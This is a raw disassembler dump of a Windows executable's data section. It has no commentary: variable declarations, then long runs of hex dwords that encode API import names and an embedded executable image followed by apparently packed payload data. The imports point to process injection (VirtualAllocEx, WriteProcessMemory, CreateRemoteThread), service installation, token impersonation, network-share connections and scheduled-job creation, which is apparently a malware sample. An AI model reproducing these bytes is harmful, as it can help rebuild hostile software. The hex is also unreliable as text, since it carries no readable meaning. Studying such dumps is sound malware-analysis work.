; void *dword_9BA2B0
dword_9BA2B0 dd 0 ; DATA XREF: sub_9AEEBC:loc_9AEF29�r
; sub_9AEFDD+7E�w
dword_9BA2B4 dd 0 ; DATA XREF: sub_9AEF58:loc_9AEFBE�r
; sub_9AEFDD+E�r ...
; void *Base
Base dd 0 ; DATA XREF: sub_9AEEBC+17�r
; sub_9AEFDD+B7�w
; size_t NumOfElements
NumOfElements dd 0 ; DATA XREF: sub_9AEEBC+20�r
; sub_9AEFDD+C7�w
; void *dword_9BA2C0
dword_9BA2C0 dd 0 ; DATA XREF: sub_9AEEBC:loc_9AEEFE�r
; sub_9AEFDD+97�w
; size_t dword_9BA2C4
dword_9BA2C4 dd 0 ; DATA XREF: sub_9AEEBC+4C�r
; sub_9AEFDD+A7�w
dword_9BA2C8 dd 0 ; DATA XREF: sub_9B3D11+4�r
; sub_9B3D23+19�w ...
dword_9BA2CC dd 0 ; DATA XREF: sub_9B3D11+C�r
; sub_9B3D23+C�r ...
dword_9BA2D0 dd 0 ; DATA XREF: sub_9B3D23+1E�w
; sub_9B3DC6+23�r ...
dword_9BA2D4 dd 0 ; DATA XREF: sub_9B3D23+31�w
; sub_9B3D6A+F�r ...
dword_9BA2D8 dd 0 ; DATA XREF: sub_9B3D23+36�w
; sub_9B3D6A+19�r ...
dword_9BA2DC dd 0 ; DATA XREF: sub_9B3D23+3B�w
; sub_9B3D6A+23�r ...
dword_9BA2E0 dd 1 ; DATA XREF: _CRT_INIT(x,x,x)+8�r
; _CRT_INIT(x,x,x)+10�w ...
dword_9BA2E4 dd 0 ; DATA XREF: sub_9B6363+E0�r
; sub_9B6665+8A�w
; RPC_BINDING_HANDLE Binding
Binding dd 0 ; DATA XREF: .text:pStubDescriptor�o
; sub_9A97A7+2F�o ...
dword_9BA2EC dd 0 ; DATA XREF: _CRT_INIT(x,x,x)+21�w
dword_9BA2F0 dd 34710h ; DATA XREF: _CRT_INIT(x,x,x)+54�w
; _CRT_INIT(x,x,x)+75�r
; void *Memory
Memory dd 34710h ; DATA XREF: _CRT_INIT(x,x,x)+37�w
; _CRT_INIT(x,x,x)+45�r ...
dword_9BA2F8 dd 0 ; DATA XREF: start:loc_9B71F2�r
; start+82�r
dd 0B41h dup(0)
dd 1C8h, 0A4h, 6C745201h, 69776E55h, 100646Eh, 74696157h
dd 4D726F46h, 69746C75h, 4F656C70h, 63656A62h, 1007374h
dd 74737953h, 69546D65h, 6F54656Dh, 656C6946h, 656D6954h
dd 72460100h, 694C6565h, 72617262h, 47010079h, 65567465h
dd 6F697372h, 4178456Eh, 65470100h, 73795374h, 446D6574h
dd 63657269h, 79726F74h, 43010041h, 65736F6Ch, 646E6148h
dd 100656Ch, 626F6C47h, 72466C61h, 1006565h, 626F6C47h
dd 6C416C61h, 636F6Ch, 74654701h, 7473614Ch, 6F727245h
dd 47010072h, 75437465h, 6E657272h, 6F725074h, 73736563h
dd 69570100h, 68436564h, 6F547261h, 746C754Dh, 74794269h
dd 47010065h, 65567465h, 6F697372h, 4D01006Eh, 4665766Fh
dd 45656C69h, 1004178h, 65766F4Dh, 656C6946h, 47010041h
dd 65547465h, 6150706Dh, 416874h, 656C5301h, 1007065h
dd 656C6544h, 69466574h, 41656Ch, 636F4C01h, 6C69466Bh
dd 47010065h, 69467465h, 6953656Ch, 100657Ah, 61657243h
dd 69466574h, 41656Ch, 74655301h, 6F727245h, 646F4D72h
dd 43010065h, 74616572h, 72685465h, 646165h, 69784501h
dd 6F725074h, 73736563h, 704F0100h, 754D6E65h, 41786574h
dd 65470100h, 6D6F4374h, 646E616Dh, 656E694Ch, 43010041h
dd 74616572h, 74754D65h, 417865h, 74654701h, 706D6F43h
dd 72657475h, 656D614Eh, 47010041h, 6F4D7465h, 656C7564h
dd 656C6946h, 656D614Eh, 47010041h, 75437465h, 6E657272h
dd 6F725074h, 73736563h, 1006449h, 61736944h, 54656C62h
dd 61657268h, 62694C64h, 79726172h, 6C6C6143h, 44010073h
dd 63697665h, 436F4965h, 72746E6Fh, 1006C6Fh, 74697257h
dd 6C694665h, 47010065h, 65547465h, 6946706Dh, 614E656Ch
dd 41656Dh, 6C654401h, 46657465h, 57656C69h, 65470100h
dd 636F4C74h, 69546C61h, 100656Dh, 61657243h, 69466574h
dd 57656Ch, 6E694601h, 6F6C4364h, 1006573h, 646E6946h
dd 73726946h, 6C694674h, 1005765h, 746C754Dh, 74794269h
dd 576F5465h, 43656469h, 726168h, 74654701h, 706D6F43h
dd 72657475h, 656D614Eh, 54010057h, 696D7265h, 6574616Eh
dd 65726854h, 1006461h, 43746547h, 65727275h, 6854746Eh
dd 64616572h, 1006449h, 74696157h, 53726F46h, 6C676E69h
dd 6A624F65h, 746365h, 74655301h, 7473614Ch, 6F727245h
dd 4D010072h, 6C75646Fh, 4E323365h, 747865h, 646F4D01h
dd 33656C75h, 72694632h, 1007473h, 61657243h, 6F546574h
dd 65686C6Fh, 3233706Ch, 70616E53h, 746F6873h, 65530100h
dd 72685474h, 50646165h, 726F6972h, 797469h, 72695601h
dd 6C617574h, 746F7250h, 746365h, 74654701h, 65726854h
dd 72506461h, 69726F69h, 1007974h, 43746547h, 65727275h
dd 6854746Eh, 64616572h, 69560100h, 61757472h, 6572466Ch
dd 56010065h, 75747269h, 6C416C61h, 636F6Ch, 74654701h
dd 636F7250h, 72646441h, 737365h, 616F4C01h, 62694C64h
dd 79726172h, 47010041h, 6F4D7465h, 656C7564h, 646E6148h
dd 41656Ch, 65724301h, 44657461h, 63657269h, 79726F74h
dd 46010041h, 46646E69h, 74737269h, 656C6946h, 47010041h
dd 6F567465h, 656D756Ch, 6F666E49h, 74616D72h, 416E6F69h
dd 65470100h, 69724474h, 79546576h, 416570h, 74654701h
dd 69676F4Ch, 446C6163h, 65766972h, 47010073h, 69547465h
dd 6F436B63h, 746E75h, 65755101h, 65507972h, 726F6672h
dd 636E616Dh, 756F4365h, 7265746Eh, 65530100h, 6C694674h
dd 6D695465h, 47010065h, 69467465h, 6954656Ch, 100656Dh
dd 70616548h, 6F6C6C41h, 47010063h, 72507465h, 7365636Fh
dd 61654873h, 48010070h, 46706165h, 656572h, 61655201h
dd 6C694664h, 50010065h, 65636F72h, 32337373h, 7478654Eh
dd 72500100h, 7365636Fh, 46323373h, 74737269h, 68540100h
dd 64616572h, 654E3233h, 1007478h, 6E65704Fh, 65726854h
dd 1006461h, 65726854h, 32336461h, 73726946h, 43010074h
dd 74616572h, 6D655265h, 5465746Fh, 61657268h, 57010064h
dd 65746972h, 636F7250h, 4D737365h, 726F6D65h, 56010079h
dd 75747269h, 6C416C61h, 45636F6Ch, 4F010078h, 506E6570h
dd 65636F72h, 1007373h, 64616552h, 636F7250h, 4D737365h
dd 726F6D65h, 53010079h, 69467465h, 7441656Ch, 62697274h
dd 73657475h, 47010041h, 69467465h, 7441656Ch, 62697274h
dd 73657475h, 47010041h, 75437465h, 6E657272h, 72694474h
dd 6F746365h, 417972h, 65724301h, 50657461h, 65636F72h
dd 417373h, 746E4901h, 6F6C7265h, 64656B63h, 72636544h
dd 6E656D65h, 49010074h, 7265746Eh, 6B636F6Ch, 6E496465h
dd 6D657263h, 746E65h, 746E4901h, 6F6C7265h, 64656B63h
dd 68637845h, 65676E61h, 72430100h, 65746165h, 6E657645h
dd 1004174h, 45746553h, 746E6576h, 704F0100h, 76456E65h
dd 41746E65h, 65470100h, 73795374h, 546D6574h, 656D69h
dd 1D500h, 0
db 0
db 1, 52h, 65h
aGopenkeyexw db 'gOpenKeyExW',0
db 1
aRegsetkeysecur db 'RegSetKeySecurity',0
db 1
aOpenscmanagerw db 'OpenSCManagerW',0
db 1
aEnumservicesst db 'EnumServicesStatusW',0
db 1
aOpenservicew_0 db 'OpenServiceW',0
dw 5101h
aUeryservicecon db 'ueryServiceConfigW',0
db 1
aQueryservice_1 db 'QueryServiceConfig2W',0
db 1, 49h, 6Dh
aPersonatelogge db 'personateLoggedOnUser',0
dw 4901h
aNitializesecur db 'nitializeSecurityDescriptor',0
dd 74654701h, 676E654Ch, 69536874h, 49010064h, 6974696Eh
dd 7A696C61h, 6C634165h, 64410100h, 63634164h, 41737365h
dd 776F6C6Ch, 63416465h, 53010065h, 65537465h, 69727563h
dd 65447974h, 69726373h, 726F7470h, 6C636144h, 65530100h
dd 6C694674h, 63655365h, 74697275h, 1004179h, 51676552h
dd 79726575h, 756C6156h, 41784565h, 65520100h, 65704F67h
dd 79654B6Eh, 417845h, 67655201h, 56746553h, 65756C61h
dd 417845h, 67655201h, 736F6C43h, 79654B65h, 6F4C0100h
dd 70756B6Fh, 76697250h, 67656C69h, 6C615665h, 416575h
dd 6A644101h, 54747375h, 6E656B6Fh, 76697250h, 67656C69h
dd 1007365h, 6E616843h, 65536567h, 63697672h, 6E6F4365h
dd 41676966h, 65520100h, 74726576h, 65536F54h, 100666Ch
dd 61657243h, 65536574h, 63697672h, 1004165h, 72617453h
dd 72655374h, 65636976h, 4F010041h, 536E6570h, 6E614D43h
dd 72656761h, 4F010041h, 536E6570h, 69767265h, 416563h
dd 6F6C4301h, 65536573h, 63697672h, 6E614865h, 656C64h
dd 6E6F4301h, 6C6F7274h, 76726553h, 656369h, 6C654401h
dd 53657465h, 69767265h, 1006563h, 6E65704Fh, 636F7250h
dd 54737365h, 6E656B6Fh, 65470100h, 6B6F5474h, 6E496E65h
dd 6D726F66h, 6F697461h, 4101006Eh, 636F6C6Ch, 41657461h
dd 6E49646Eh, 61697469h, 657A696Ch, 646953h, 75714501h
dd 69536C61h, 46010064h, 53656572h, 1006469h, 45676552h
dd 4B6D756Eh, 78457965h, 52010057h, 65536765h, 6C615674h
dd 78456575h, 52010057h, 75516765h, 56797265h, 65756C61h
dd 577845h, 67655201h, 73756C46h, 79654B68h, 65520100h
dd 65724367h, 4B657461h, 78457965h, 52010057h, 72436765h
dd 65746165h, 4579654Bh, 4178h, 1E2h, 214h, 654E5701h
dd 64644174h, 6E6E6F43h, 69746365h, 57326E6Fh, 4E570100h
dd 64417465h, 6E6F4364h, 7463656Eh, 326E6F69h, 57010041h
dd 4374654Eh, 65636E61h, 6E6F436Ch, 7463656Eh, 326E6F69h
dd 57010041h, 4374654Eh, 65636E61h, 6E6F436Ch, 7463656Eh
dd 326E6F69h, 0EA000057h, 28000001h, 1000002h, 7274735Fh
dd 706D6369h, 695F0100h, 7474696Eh, 6D7265h, 64615F01h
dd 7473756Ah, 6964665Fh, 63010076h, 6F6C6C61h, 73010063h
dd 6E616373h, 6D010066h, 6F6D6D65h, 1006576h, 61657362h
dd 686372h, 73626101h, 69730100h, 6C01006Eh, 100676Fh
dd 74727473h, 1006B6Fh, 696F7461h, 775F0100h, 75647363h
dd 70010070h, 746E6972h, 73010066h, 70637274h, 73010079h
dd 68637274h, 73010072h, 6D637274h, 73010070h, 61637274h
dd 77010074h, 74737363h, 6D010072h, 70636D65h, 5F010079h
dd 6C727473h, 1007277h, 73727473h, 1007274h, 7274735Fh
dd 707564h, 73637701h, 7970636Eh, 63770100h, 6E656C73h
dd 616D0100h, 636F6C6Ch, 72660100h, 1006565h, 6C616572h
dd 636F6Ch, 73637701h, 746163h, 73637701h, 797063h, 73637701h
dd 706D63h, 6D656D01h, 746573h, 6E735F01h, 69727077h, 66746Eh
dd 6D656D01h, 706D63h, 72747301h, 7461636Eh, 72730100h
dd 646E61h, 6E617201h, 5F010064h, 72706E73h, 66746E69h
dd 74730100h, 70636E72h, 73010079h, 63727274h, 1007268h
dd 7274735Fh, 6D63696Eh, 73010070h, 656C7274h, 5F01006Eh
dd 696D656Dh, 706D63h, 1F500h, 2D800h, 654E0100h, 69704174h
dd 66667542h, 72467265h, 1006565h, 5374654Eh, 64656863h
dd 4A656C75h, 6544626Fh, 4E01006Ch, 63537465h, 75646568h
dd 6F4A656Ch, 756E4562h, 4E01006Dh, 63537465h, 75646568h
dd 6F4A656Ch, 64644162h, 654E0100h, 65735574h, 756E4572h
dd 4E01006Dh, 65537465h, 72657672h, 6D756E45h, 654E0100h
dd 736B5774h, 65476174h, 666E4974h, 200006Fh, 0C000002h
dd 1000004h, 6E496F43h, 61697469h, 657A696Ch, 75636553h
dd 79746972h, 6F430100h, 61657243h, 6E496574h, 6E617473h
dd 1006563h, 6E556F43h, 74696E69h, 696C6169h, 100657Ah
dd 6E496F43h, 61697469h, 657A696Ch, 7845h, 20Ch, 2F8h
dd 0FF0009FFh, 6FF0008h, 7FF00h, 2FFh, 219h, 310h, 63705201h
dd 646E6942h, 46676E69h, 536D6F72h, 6E697274h, 6E694267h
dd 676E6964h, 52010041h, 74536370h, 676E6972h, 646E6942h
dd 43676E69h, 6F706D6Fh, 416573h, 72644E01h, 65696C43h
dd 6143746Eh, 326C6Ch, 63705201h, 646E6942h, 46676E69h
dd 656572h, 22400h, 32400h, 44FF00h, 47485301h, 70537465h
dd 61696365h, 6C6F466Ch, 50726564h, 41687461h, 2300000h
dd 3300000h, 53010000h, 6C654448h, 4B657465h, 417965h
dd 44485301h, 74656C65h, 6C615665h, 416575h, 72745301h
dd 49727453h, 53010057h, 74537274h, 414972h, 23C00h, 42000h
dd 624F0100h, 6E696174h, 72657355h, 6E656741h, 72745374h
dd 676E69h, 24700h, 34400h, 65470100h, 73614C74h, 706E4974h
dd 6E497475h, 1006F66h, 74736F50h, 7373654Dh, 41656761h
dd 65470100h, 676C4474h, 6D657449h, 6E450100h, 68546D75h
dd 64616572h, 646E6957h, 73776Fh, 66654401h, 646E6957h
dd 7250776Fh, 41636Fh, 73694401h, 63746170h, 73654D68h
dd 65676173h, 52010041h, 73696765h, 43726574h, 7373616Ch
dd 43010041h, 74616572h, 6E695765h, 45776F64h, 1004178h
dd 4D746547h, 61737365h, 416567h, 61725401h, 616C736Eh
dd 654D6574h, 67617373h, 4C010065h, 5364616Fh, 6E697274h
dd 4167h, 252h, 374h, 72655601h, 72657551h, 6C615679h
dd 416575h, 74654701h, 656C6946h, 73726556h, 496E6F69h
dd 536F666Eh, 41657A69h, 65470100h, 6C694674h, 72655665h
dd 6E6F6973h, 6F666E49h, 5E000041h, 84000002h, 1000003h
dd 65746E49h, 74656E72h, 6E65704Fh, 416C7255h, 74480100h
dd 75517074h, 49797265h, 416F666Eh, 6E490100h, 6E726574h
dd 65477465h, 6E6F4374h, 7463656Eh, 74536465h, 657461h
dd 746E4901h, 656E7265h, 61655274h, 6C694664h, 49010065h
dd 7265746Eh, 4F74656Eh, 416E6570h, 6E490100h, 6E726574h
dd 6C437465h, 4865736Fh, 6C646E61h, 6A000065h, 0A0000002h
dd 0FF000003h, 1FF000Dh, 14FF00h, 0FF0015FFh, 2FF0073h
dd 6FF00h, 0FF0016FFh, 8FF0034h, 0EFF00h, 0FF0004FFh, 39FF006Fh
dd 0CFF00h, 0FF000BFFh, 3FF0009h, 13FF00h, 0FF0012FFh
dd 0AFF0097h, 10FF00h, 0FF0070FFh, 57010017h, 6F494153h
dd 6C7463h, 0
dd 16ACF000h, 4F0041Ch, 0CF00409h, 414040Fh, 40C040Ch
dd 40C0484h, 42C045Ch, 40C045Ch, 2 dup(40C040Ch), 0C10040Ch
dd 0F0040C04h, 8404019Ch, 124F004h, 0C044C04h, 19CF004h
dd 0C040C04h, 2D4F004h, 154F004h, 0F004CC04h, 4041DD8h
dd 4AC1404h, 42C040Ch, 8CF0040Ch, 4040402h, 22046CF0h
dd 36213B06h, 1318161Ah, 1B0F072Dh, 10692715h, 5D0A181Fh
dd 80D060Bh, 0F3D120Dh, 60F2D14h, 10250E29h, 92C095Ah
dd 192D0A06h, 20150B0Dh, 0F090B13h, 0B272B49h, 0E151B17h
dd 36061A21h, 0C0C1D0Ah, 0C0C0C05h, 0C050705h, 573A190Bh
dd 2006070Ah, 0F060C1Eh, 18080B12h, 6090605h, 16062B05h
dd 151C0A10h, 151A0B06h, 16070828h, 6070A2Dh, 0A0E0C24h
dd 45F0A923h, 0D061C01h, 0A16234Bh, 0E220A0Fh, 280F061Eh
dd 260D0626h, 2219501Eh, 15122115h, 1C57240Dh, 81063906h
dd 350E340Ch, 6253A1Dh, 9110819h, 91E0719h, 0C291612h
dd 91D0E2Eh, 1B120D07h, 1F192020h, 7F306461h, 9114B58h
dd 2B0A215Dh, 96C0F16h, 0C0A066Fh, 151E1A0Dh, 140E0708h
dd 0A0A1006h, 1F52080Ah, 8069430h, 2507110Ah, 0F201035h
dd 31360608h, 0F0E082Eh, 7111907h, 8361127h, 6093008h
dd 8012FF0h, 35093306h, 3B472237h, 13082B19h, 2157071Eh
dd 0B730C17h, 396C450Ah, 135A0C25h, 48243D65h, 248C0710h
dd 362E1A19h, 0F1D160Eh, 0C911A1Eh, 71D2E19h, 5130909h
dd 13062B05h, 909071Dh, 62B142Eh, 818122Fh, 93C0817h, 312D1019h
dd 7A288373h, 362F6B1Ch, 91B2F31h, 0E152A0Fh, 3D4F2E0Eh
dd 30131115h, 1115331Fh, 15332A13h, 32331311h, 13121015h
dd 989B1D80h, 140D1E3Bh, 451EAA0Ah, 170F0D1Ch, 50B0627h
dd 50E0505h, 5120505h, 50B0505h, 5050D05h, 2805050Dh, 5080706h
dd 15110505h, 0D15120Dh, 3F1B1210h, 14070716h, 5E123865h
dd 42141A30h, 8050A3Bh, 12240E1Eh, 270C8E13h, 0C071825h
dd 3F130710h, 0D151D3Bh, 421D4707h, 1D2E100Bh, 0D2B3006h
dd 214C0E80h, 34250F30h, 0D341E0Dh, 255D0625h, 452F300Fh
dd 12215708h, 2A070A10h, 24090625h, 110B0B15h, 310E240Ah
dd 5361517h, 1707112Ah, 280E1421h, 14140906h, 0E0A0B0Eh
dd 2CCE1F2Eh, 8152A60h, 1B0E140Ch, 1114061Ah, 26072A14h
dd 301C0E16h, 6070638h, 142D0731h, 22070D07h, 1F190B12h
dd 171E2909h, 10285B17h, 5D111613h, 93D2329h, 34440B1Dh
dd 35212543h, 151D1938h, 265D1309h, 6111E2Bh, 201B0805h
dd 5150516h, 6091B52h, 19110A27h, 7060585h, 2494371Ch
dd 9050614h, 0E1A5D08h, 480E1924h, 184D0826h, 0F1C0F09h
dd 0E360F10h, 0D701821h, 8141A19h, 0E06340Bh, 71D3520h
dd 5111728h, 2E0C1209h, 0D881733h, 1A380606h, 18600A0Ah
dd 2B061223h, 0E080620h, 100B100Ah, 1A060610h, 1A073B4Eh
dd 19060B23h, 7080635h, 80070822h, 0C0C1409h, 1D0C0606h
dd 7060814h, 1A050610h, 723320Ah, 4B160D0Bh, 11101409h
dd 0A0B54A3h, 7080E1Bh, 99160908h, 0D06060Bh, 14090509h
dd 908110Ch, 807080Eh, 9981209h, 40071C06h, 1C090509h
dd 2D060607h, 130E0A0Eh, 710060Ah, 35051021h, 150D1F1Dh
dd 2A262061h, 0B261311h, 61F0909h, 11093F17h, 0E0C1113h
dd 1A0E2E0Fh, 28461631h, 6716370Eh, 0D1C0912h, 0B0A1718h
dd 0A121419h, 1311131Dh, 0C1E1A1Ah, 9181B08h, 12190E1Ah
dd 491A3C09h, 0A08060Ah, 0A1F0F38h, 0E1E0C0Eh, 29072D0Ch
dd 4F053B10h, 530D1957h, 23063C0Ah, 116E062Dh, 223B0905h
dd 50F062Fh, 1D2F0666h, 0C0B1205h, 1509061Bh, 0A071111h
dd 180E1407h, 2F5B1629h, 28085A13h, 4113081Ah, 22045AF0h
dd 3C0E3C39h, 707940Ch, 0E1B150Dh, 12181212h, 11321312h
dd 2C3F1209h, 260E1305h, 130D07A6h, 0E0E0E17h, 1D091C0Eh
dd 9F060C14h, 2F06062Ah, 3A09090Bh, 0D211206h, 0C140E13h
dd 110D0C45h, 0D112816h, 17112432h, 0C0C0708h, 6190607h
dd 807080Ch, 14120B0Dh, 0C1C0F1Eh, 1D051317h, 6381A05h
dd 33292207h, 90A0788h, 19090919h, 431E0909h, 21100908h
dd 3C1E140Eh, 11100910h, 0F0B01D0Fh, 0B2F00174h, 350F008h
dd 0D9F04B0Eh, 0D2F0DD01h, 4C1F4909h, 154F07Ah, 64796E16h
dd 0F0345910h, 0D84B0145h, 14232052h, 0A7F03D7Ah, 57F03104h
dd 5D6F009h, 0F0024BF0h, 32F004D0h, 5D4F001h, 0Dh dup(4040404h)
dd 0F0E30404h, 0F01A0172h, 523A023Fh, 71307CEh, 5130505h
dd 90A1C05h, 90A1E2Bh, 7142B2Bh, 24071421h, 0C200809h
dd 1320361Eh, 1E0A0C1Fh, 32882008h, 3C07154Dh, 6AF04747h
dd 5A214903h, 19196C11h, 135A1919h, 9361724h, 1207072Fh
dd 91B0AAAh, 2C1E727Fh, 331E6860h, 108B0B80h, 7A41922h
dd 120E1630h, 102F00Dh, 53B2229h, 19124D0Ch, 573F1F0Ch
dd 0A57237Dh, 11287B2Ch, 92B2211h, 5E071A29h, 19151728h
dd 71B6407h, 7070A0Ah, 14070707h, 1A220A0Ah, 13461907h
dd 230C0A09h, 4F19071Ah, 0C250F11h, 26272A22h, 27272723h
dd 5815071Ah, 0C0A0913h, 2C2B0C23h, 0F0130719h, 0F0550869h
dd 0F0D10219h, 0C550018Bh, 1302EFF0h, 410365F0h, 0F0091A69h
dd 60600F9h, 6060606h, 390606E0h, 0D0B0608h, 5050E08h
dd 0A0D0B05h, 22060C15h, 61D5C12h, 6 dup(6060606h), 5060606h
dd 41CF7F0h, 3Dh dup(4040404h), 8040404h, 0Fh dup(4040404h)
dd 0F0040404h, 40405C0h, 5 dup(4040404h), 0F0040404h, 4040210h
dd 5 dup(4040404h), 0C040404h, 18040404h, 455000h, 3014C00h
dd 0AF48F100h, 3Eh, 0
dd 0E00E000h, 7010B21h, 1780000h, 280000h, 0
dd 171CC00h, 100000h, 1900000h, 0
dd 100010h, 20000h, 400h, 5A000400h, 400h, 0
dd 1D00000h, 40000h, 0
dd 200h, 10000000h, 100000h, 10000000h, 100000h, 0
dd 1000h, 2 dup(0)
dd 1736400h, 14000h, 6 dup(0)
dd 1B00000h, 0F9800h, 0Ch dup(0)
dd 100000h, 42800h, 6 dup(0)
dd 65742E00h, 7478h, 177FA00h, 100000h, 1780000h, 40000h
dd 3 dup(0)
dd 2000h, 61642E60h, 6174h, 12FC00h, 1900000h, 100000h
dd 17C0000h, 3 dup(0)
dd 4000h, 65722EC0h, 636F6Ch, 130A00h, 1B00000h, 140000h
dd 18C0000h, 3 dup(0)
dd 4000h, 1C00042h, 178CC00h, 1CE0900h, 0D5C10000h, 8C000001h
dd 54607080h, 0D35E2248h, 14243434h, 0FFFFED69h, 0A7E7BD41h
dd 0CA45F52Dh, 44E64912h, 4C72D61Eh, 723CBA1Bh, 0F6FFEAF0h
dd 75EBFFFFh, 44E85EF3h, 0E95687CDh, 3406E621h, 93497633h
dd 36A4EC42h, 4DADA619h, 0FFFF5912h, 967FFFFFh, 25418501h
dd 7E83E2CBh, 0B385DF72h, 0FB59E1DDh, 2D9A7897h, 0E93DB6B2h
dd 39455258h, 0FFFF901Bh, 9FC8FFFFh, 422B5CD7h, 0D86AA6DEh
dd 4CF2D003h, 2E2472AFh, 4DF38C9Dh, 0F24D2F2Fh, 2989D649h
dd 0FFFFC9A2h, 0FFC6FFFFh, 0B6985FF2h, 92AD0968h, 10D57010h
dd 0B6DA1CEAh, 0CC03D4BCh, 578E9E8Dh, 0BCFCCF8Ch, 1450C35Bh
dd 319EFE17h, 8A08DA5Bh, 0D2BF2693h, 0BFFFFFFBh, 873383D6h
dd 0F6C269AFh, 3499155Fh, 880FCB14h, 0E92944CCh, 7E9E4593h
dd 228712F9h, 7FFF837Fh, 0BB43338Eh, 605B400Ch, 3140864Ch
dd 0B6659917h, 0E58AC26Ch, 0FFF030A4h, 0F3D9FFFFh, 0EBBB6AD6h
dd 0EC02DADFh, 237E386Dh, 8A6811EEh, 93A87D62h, 0DCC69E93h
dd 0BFFF17Bh, 6670BFFFh, 3DC83972h, 20C356E5h, 259AA8D9h
dd 0D4993B3Fh, 0D7D1617Eh, 0FFFF5074h, 6AE3FFFFh, 315A49EBh
dd 29DE213Dh, 0FC30CD4Ah, 98D7FDD1h, 0A64B6073h, 0F95D0853h
dd 21E605EEh, 0FFFFED97h, 0B7D9F0BFh, 0B18FBCD6h, 26BD6B76h
dd 1C2C8A60h, 2D58E6B6h, 9404D47h, 9DB1835Bh, 0FFFF46FFh
dd 0A28E983Ch, 7A5D9E2Dh, 0C80DF107h, 0B047261Bh, 76087045h
dd 0CF9CC24Ch, 0FFFFFFFFh, 1E0EF33Ah, 15A800C6h, 7E9247CBh
dd 4207F91Dh, 0DC4992AAh, 0D6ED7104h, 0ADE6DCE7h, 1825BD3Ch
dd 0FFFFFFFFh, 0FAECFA32h, 0CCFBA5B7h, 0BA5249A1h, 0D3A76030h
dd 0E595A3B0h, 0BD61DAF2h, 0C097D227h, 373366D8h, 0FFFFFFFFh
dd 36D21304h, 24CB3F9Dh, 692E6B79h, 0AD0BE122h, 8A485BC1h
dd 8700D5E1h, 0F5064437h, 4B744CAEh, 0FFFFFFFFh, 57A30F20h
dd 57D40863h, 0E33AF0EBh, 0DFC4031Ah, 7F2D179Ah, 71441FFDh
dd 0BAB749DAh, 0DDB5263Fh, 0FFF4BFFFh, 18CAFE9Ch, 99ECDB70h
dd 30968463h, 73334C17h, 0C3B2BC4Dh, 68832C79h, 0DD3441CDh
dd 455CFE86h, 0BEE77DEDh, 3C396FA8h, 0A6243003h, 7367BA69h
dd 14031C39h, 734D0C10h, 4089A69h, 0F8FC3800h, 0D34D34F4h
dd 0E8ECF034h, 34D3E0E4h, 0D8DCD34Dh, 74C0C8D0h, 0B84DF8C7h
dd 854856B0h, 3A717756h, 20E003E4h, 0D8D34444h, 0BFB1E7D4h
dd 0A83B4E95h, 29290046h, 46094545h, 8A177508h, 10F60078h
dd 0D5450D05h, 1FBF6EB6h, 2024020h, 66660006h, 0FC06040Fh
dd 0DD683A4h, 42B0707h, 19930520h, 41901001h, 428AA374h
dd 424BF60h, 0AE882014h, 15C822A2h, 8DA8B91h, 2B9B3BA4h
dd 55D06E80h, 570AAD6Eh, 0FE88297Ah, 46746961h, 134D726Fh
dd 0A26C7069h, 2B2A8C16h, 0C6280B17h, 0A454642Ah, 71441CF6h
dd 90F6F54h, 2AE40515h, 405553A2h, 0CF549B7h, 0AB9E6547h
dd 25BF8280h, 0B9B70A0Eh, 694434CFh, 79534372h, 7A22AF14h
dd 1B48FD0Ah, 722A8F7Bh, 0B430721h, 0D1157B1h, 21173A4Bh
dd 614CCA28h, 4D010D32h, 5A1EA080h, 44566EFBh, 656469A5h
dd 8B756843h, 0C76B036Ah, 667942A8h, 0BDEC0B7Fh, 65B92AA5h
dd 410C89A6h, 949676D0h, 28709154h, 0B033ADDAh, 6513530Dh
dd 688A0670h, 21970BD8h, 0B9EC5FDCh, 82B0ADCh, 0C7A6953h
dd 8A01D87Bh, 655323ABh, 0D928209Bh, 1A645836h, 13B6CB41h
dd 6971010Ah, 0CD6BDEA7h, 1CA18D00h, 10B7C685h, 31D58229h
dd 6822456Eh, 1E37B361h, 9FB05CD6h, 6D614EA3h, 75DF60ABh
dd 2CC25775h, 72490B13h, 562CC244h, 8E81BD15h, 0C2DC282h
dd 806C4C43h, 0B1C51026h, 686F496Fh, 1B661258h, 0C6697239h
dd 84DA5D0Bh, 5708084Bh, 2DD16284h, 0E946D09Bh, 0B461AFFh
dd 2AC1166Dh, 75030AC9h, 8490A174h, 9A8F1A60h, 94B9BBA4h
dd 7826DB0Dh, 67396D72h, 364202CBh, 184911D8h, 8B1976C6h
dd 89672853h, 0D90909F0h, 3320531Bh, 10934E32h, 7443B65Bh
dd 6F98900Dh, 6DB6DBECh, 70D868F7h, 70705316h, 446F6873h
dd 0D9851A18h, 112E4566h, 75BB4358h, 743356BDh, 7456ED75h
dd 5B236467h, 0A32247D9h, 648CB034h, 0C30CC28Fh, 0E282931Eh
dd 93579AA2h, 9B124206h, 2C240BDBh, 2B0D1929h, 0ED85415Ah
dd 0CA56332Ch, 0CD403F75h, 16560496h, 138A2266h, 330E869Ah
dd 57688838h, 0E88A15B8h, 0C9731B36h, 0ED436B0Fh, 7B1E8223h
dd 3503901h, 631AC5A1h, 161B6E42h, 6076130Eh, 47D81497h
dd 0CD99480Ch, 70D85B9Eh, 1A14D1D5h, 9C30CD82h, 571052FDh
dd 65843020h, 950E9413h, 9B0D3B36h, 11211D3Bh, 42450519h
dd 18B0BE58h, 224162C3h, 42D251BEh, 194D6E68h, 647D77CAh
dd 52B3492Fh, 512F9681h, 0E82C1D28h, 8F117441h, 0D09B2B09h
dd 13357393h, 962CDEEh, 5295C12Bh, 0F0F4510Fh, 6C3D4925h
dd 61394436h, 1C246B6Eh, 49152F6Dh, 0E88A336Eh, 2F8F4500h
dd 5061EE58h, 5A217645h, 0C302480Ah, 4B15C666h, 4782F7DFh
dd 1D50090h, 2667DDACh, 62E7504Bh, 4F7965DBh, 0D3F0E57h
dd 26CFA253h, 53454E54h, 0D8D54D43h, 22F92845h, 88406E45h
dd 9E010822h, 31B059C6h, 14245768h, 45192157h, 6F0E0B31h
dd 0B026EA54h, 49153214h, 0C7378AD4h, 6F73C8B9h, 4F646174h
dd 0E7B6826Eh, 7DE94628h, 0D8628869h, 288A0B81h, 66304082h
dd 14B607D1h, 64DA48A3h, 0D0E1412Bh, 0A163AE4Ch, 0D05C0731h
dd 0F7422CAFh, 650C6577h, 61444816h, 784D9308h, 4167CE2Fh
dd 4114E006h, 6C14AEB1h, 1F084C8h, 0F41E4127h, 0CE2562E4h
dd 0B6FA81Fh, 55454AA0h, 8DF0A98Ch, 9641250Dh, 42482B6Ah
dd 1B5B9247h, 435F6E65h, 9636BC5h, 76501821h, 366F2C11h
dd 6C179B84h, 4A23E166h, 0CD65842h, 0A20E1C77h, 586C962Ch
